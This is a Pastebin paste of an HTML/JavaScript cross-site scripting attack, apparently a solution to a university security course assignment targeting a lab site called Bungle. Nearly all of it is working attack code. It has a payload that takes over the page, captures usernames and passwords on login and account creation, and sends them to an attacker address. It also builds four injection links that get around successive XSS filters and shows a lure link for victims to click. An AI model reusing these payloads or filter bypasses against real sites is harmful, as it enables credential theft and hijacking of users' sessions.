Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <meta charset="utf-8">
- <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
- <script>
- function payload(attacker) {
- function log(data) {
- console.log($.param(data))
- $.get(attacker, data);
- }
- function proxy(href, popped) {
- var stateObj = { attack: href };
- if (popped) {
- history.pushState(stateObj, "", href);
- } else {
- history.replaceState(stateObj, "", href);
- }
- window.onpopstate = function (e) {
- var json = e.state;
- proxy(json['attack'], false);
- };
- $("html").load(href, function(){
- $("html").show();
- // Log nav
- if ($('#logged-in-user').length) {
- var logged_in_user = $('#logged-in-user').html().toString();
- log({event: "nav", user: logged_in_user, url: href})
- } else {
- log({event: "nav", url: href})
- }
- // Log logout
- $("#log-out-btn").click(function(e) {
- e.preventDefault();
- var logged_in_user = $('#logged-in-user').html().toString();
- $.post("http://cos432-assn3.cs.princeton.edu/logout",
- {},
- function() {
- log({event: "logout", user: logged_in_user});
- proxy("/", true);
- }
- );
- });
- // Log login
- $("#log-in-btn").click(function(e) {
- e.preventDefault();
- var user = $('#username').val();
- var pass = $('#userpass').val();
- $.post("http://cos432-assn3.cs.princeton.edu/login",
- {
- username: user,
- password: pass
- },
- function() {
- log({event: "login", user: user, pass: pass});
- proxy("/", true);
- }
- );
- });
- // Log create account
- $("#new-account-btn").click(function(e) {
- e.preventDefault();
- var user = $('#username').val();
- var pass = $('#userpass').val();
- $.post("http://cos432-assn3.cs.princeton.edu/create",
- {
- username: user,
- password: pass
- },
- function() {
- log({event: "create", user: user, pass: pass});
- proxy("/", true);
- }
- );
- });
- // Navigate to search
- $("#search-btn").click(function(e) {
- e.preventDefault();
- proxy("/search?q=" + encodeURIComponent($("#query").val()));
- });
- // Navigate to search again
- $("#search-again-btn").click(function(e) {
- e.preventDefault();
- proxy("/", true);
- });
- // Home page
- $("#bungle-lnk").click(function(e) {
- e.preventDefault();
- proxy("/", true);
- });
- // Hide attacks in search
- $("a:contains(\"<scrip\")").hide();
- $("a:contains(\"<bod\")").hide();
- $("a:contains(\"<iframe\")").hide();
- });
- }
- $("html").hide();
- proxy("/", true);
- }
- function makeLink(xssdefense, target, attacker) {
- // Simply insert payload as a script
- if (xssdefense == 0) {
- return target + "/search?xssdefense=" + xssdefense.toString() + "&q=" +
- encodeURIComponent("<script" + ">" + payload.toString() +
- ";payload(\"" + attacker + "\");</script" + ">");
- }
- // Replace script with scrscriptipt so that when script is removed, it
- // is the same as before
- else if (xssdefense == 1) {
- return target + "/search?xssdefense=" + xssdefense.toString() + "&q=" +
- encodeURIComponent("<scrscriptipt" + ">" + payload.toString() +
- ";payload(\"" + attacker + "\");</scrscriptipt" + ">");
- }
- // Use body onload to inject payload
- else if (xssdefense == 2) {
- return target + "/search?xssdefense=" + xssdefense.toString() + "&q=" +
- encodeURIComponent("<body onload='" + payload.toString() +
- ";payload(\"" + attacker + "\")'" + ">" + "</body" + ">");
- }
- // Use iframe onload to inject payload
- else if (xssdefense == 3) {
- return target + "/search?xssdefense=" + xssdefense.toString() + "&q=" +
- encodeURIComponent("<iframe onload='" + payload.toString() +
- ";payload(\"" + attacker + "\")'" + ">" + "</iframe" + ">");
- }
- }
- // Select xss defense and make malicious link for user to click
- var xssdefense = 2;
- var target = "http://cos432-assn3.cs.princeton.edu";
- var attacker = "http://127.0.0.1:31337/stolen";
- $(function() {
- var url = makeLink(xssdefense, target, attacker);
- $("h3").html("<a target=\"run\" href=\"" + url + "\">Try Bungle!</a>");
- });
- </script>
- <h3></h3>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement